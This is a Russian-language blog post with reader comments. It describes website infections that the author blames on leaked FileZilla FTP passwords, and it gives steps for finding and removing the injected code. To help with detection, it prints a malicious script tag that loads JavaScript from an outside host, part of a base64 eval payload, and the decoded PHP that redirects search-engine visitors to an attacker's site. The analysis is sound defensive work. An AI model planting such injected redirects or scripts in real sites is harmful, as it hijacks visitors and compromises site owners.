FileZilla сливает пароли. Проверьте на вирусы. | DAndreev.com

FileZilla сливает пароли. Проверьте на вирусы.

Всем привет. На днях обнаружил, что мой любимый FTP клиент – FileZilla оказывается любит сливать пароли. Как бы он мне не нравился, мне пришлось полностью отказаться от его использования, так как по этой причине было заражено несколько сайтов моих клиентов. Если вы пользуетесь этим клиентом, рекомендую проверить все файлы на FTP.
Я обнаружил следующих 2 внедренных вируса в сайты:

1. JavaScript  – ChangeIP

С этим все просто, проверяете все индексные файлы(index.php, index.html и т.п.) на наличие кода вставляющего HTML код

< script src="http:// kinoshkaxa. changeip. name / rsize.js ">< /script >

Он может быть в различных вариантах, для php, для HTML, обычно расположен в конце индексного файла.

Удаляете и антивирусники и поисковики перестают ругаться.

2. закодированная переадресация

В с этим посложнее. В первую очередь его трудно было обнаружить, так как сайт работает нормально, особенно если на него заходить по адресной строке, так как проблемы начинаются только после перехода по ссылке с некоторых общеизвестных сайтов типа яндекс, гугл, фейсбук и прочих.

Проблема заключается в том, что в код сайта внедряется некий код, который осуществляет редирект на нужный злоумышленнику сайт.

С точки зрения поисковых систем и антивирусов, сайт работает как и надо, потому предупреждений вы не получите, а так как знаете адрес своего сайта то и заходить будете напрямую, а не по рефереру.

А вот ваши посетители с поисковиков особенно будут видеть совсем другой сайт, так как их по 301 редиректу отправят куда подальше.

потому следует заняться поиском вредоносного кода, выглядит он примерно так:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQ ... lcigiTG9jYXRpb246IGh0dHA6Ly9hdDUudXMvdXV1dXUiKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));

К сожалению полностью не могу привести здесь хеш строку. На мой сайт сразу начинают ругаться анивирусники, но я думаю вы ее сможете обнаружить, если она там есть.

По сути это php код, который зашифровывается с помощью кодировки base64, а затем уже у вас на сайте расшифровывается и выполняется на вашей странице, не долго думая можно расшифровать, что же там написано:

error_reporting(0);
    $nccv=headers_sent();
    if (!$nccv)
    {
        $referer=$_SERVER['HTTP_REFERER'];
        $ua=$_SERVER['HTTP_USER_AGENT'];
        if (stristr($referer,"yahoo")
            or stristr($referer,"bing")
            or stristr($referer,"rambler")
            or stristr($referer,"gogo")
            or stristr($referer,"live.com")
            or stristr($referer,"aport")
            or stristr($referer,"nigma")
            or stristr($referer,"webalta")
            or stristr($referer,"begun.ru")
            or stristr($referer,"stumbleupon.com")
            or stristr($referer,"bit.ly")
            or stristr($referer,"tinyurl.com")
            or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer)
            or preg_match ("/google\.(.*?)\/url\?sa/",$referer)
            or stristr($referer,"myspace.com")
            or stristr($referer,"facebook.com")
            or stristr($referer,"aol.com"))
        {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl"))
            {
                header("Location: http://at5.us/uuuuu");
                exit();
            }
        }
    }

Код оказывается очень не хитрым. Он смотрит, если пользователь пришел с одного из сайтов, поисковиков, фейсбука и т.п (Вконтакте еще не поражен, возрадуемся), то пересылает через директиву Location.

Для поиска вируса, лучше всего скачайте все исходники и с помощью Notepad++ осуществите поиск/замену вредоносного кода во всех файлах.

Так как сам код вируса, может меняться, может кто-то добавит еще сеть вконтакте и продолжит распространять его, то сам после перекодировки в base64 хеш будет уже другим и собственно вы не найдете его обычным поиском. Потому тут для обнаружения рекомендую искать по выражению “eval(base64_decode(” . Только тут будьте осторожны, некоторые CMS тоже используют эту конструкцию, не удаляйте лишнего, лучше обратитесь к специалисту.

Retweet

Самые популярные статьи

Комментарии

Decker
06 Feb, 2013в14:20

Столкнулись с аналогичной проблемой … только с другими “симптомами”. Посмотреть и обсудить можно тут – http://dml.compkaluga.ru/forum/index.php?showtopic=72706

Дмитрий Андреев
07 Feb, 2013в07:55

Добрый день, спасибо за комментарий, будем бороться вместе. Я в общем не особо разбирался, сама ли FileZilla сливает пароли или из нее научились вытаскивать, суть в том что еще находил в интернете людей у которых с FileZill’ы утекли пароли. В общем как перестал пользоваться этим клиентом, сразу прекратилось взламывание сайтов. Пришлось перейти на TotalCommander и WinSCP.

Оставить комментарий